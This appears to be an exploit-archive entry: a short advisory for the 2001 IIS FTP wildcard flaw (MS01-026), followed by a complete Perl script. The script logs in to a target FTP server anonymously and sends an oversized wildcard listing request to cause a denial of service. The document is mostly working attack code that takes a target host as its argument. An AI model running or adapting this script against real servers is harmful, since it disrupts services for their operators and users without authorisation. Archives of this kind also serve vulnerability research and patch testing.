56 lines
No EOL
1.5 KiB
Perl
Executable file
56 lines
No EOL
1.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/2717/info
|
|
|
|
Due to a flaw in the pattern-matching function used by FTP commands, denial of service attacks can be successfully launched. If a user submits an FTP command along with a filename containing specially placed wildcard sequences, the pattern-matching function will not allocate sufficent memory. Resulting in IIS experiencing denial of service condition.
|
|
|
|
#!/usr/bin/perl
|
|
# Author: Nelson Bunker - Critical Watch
|
|
# http://www.criticalwatch.com
|
|
#
|
|
# Simple Wildcard Denial of Service for IIS Ftp Servers - MS01-026
|
|
# Tested against several servers. Your mileage may vary.
|
|
#
|
|
# Assumes anonymous access.
|
|
#
|
|
# Thanks goes out to Lukasz Luzar [lluzar@developers.of.pl]
|
|
# For discovering and sharing this information
|
|
#
|
|
# May 15, 2001
|
|
####################_MAIN::Begin_#####################
|
|
|
|
|
|
use Net::FTP;
|
|
|
|
$wildcard='*********************************************************************************************************';
|
|
|
|
if (not $ARGV[0]) {
|
|
|
|
print qq~
|
|
|
|
Usage: wildcard_dos.pl <host>
|
|
|
|
~;
|
|
|
|
exit;}
|
|
|
|
|
|
$IPaddress= $ARGV[0];
|
|
|
|
|
|
$SIG {'PIPE'} = FoundIt;
|
|
|
|
# create new FTP connection w/30 second timeout
|
|
$ftp = Net::FTP->new($IPaddress, Timeout => 5);
|
|
|
|
if(!$ftp){ die"$IPaddress is not responding to ftp connect attempt";}
|
|
|
|
if(!$ftp->login("anonymous","tester\@")){ die"FTP user anonymous on $IPaddress is unacceptable";}
|
|
|
|
$bogus = $ftp->ls($wildcard);
|
|
|
|
|
|
sub FoundIt
|
|
{
|
|
print "This machine \($IPaddress\) is affected\n";
|
|
exit(0);
|
|
|
|
} |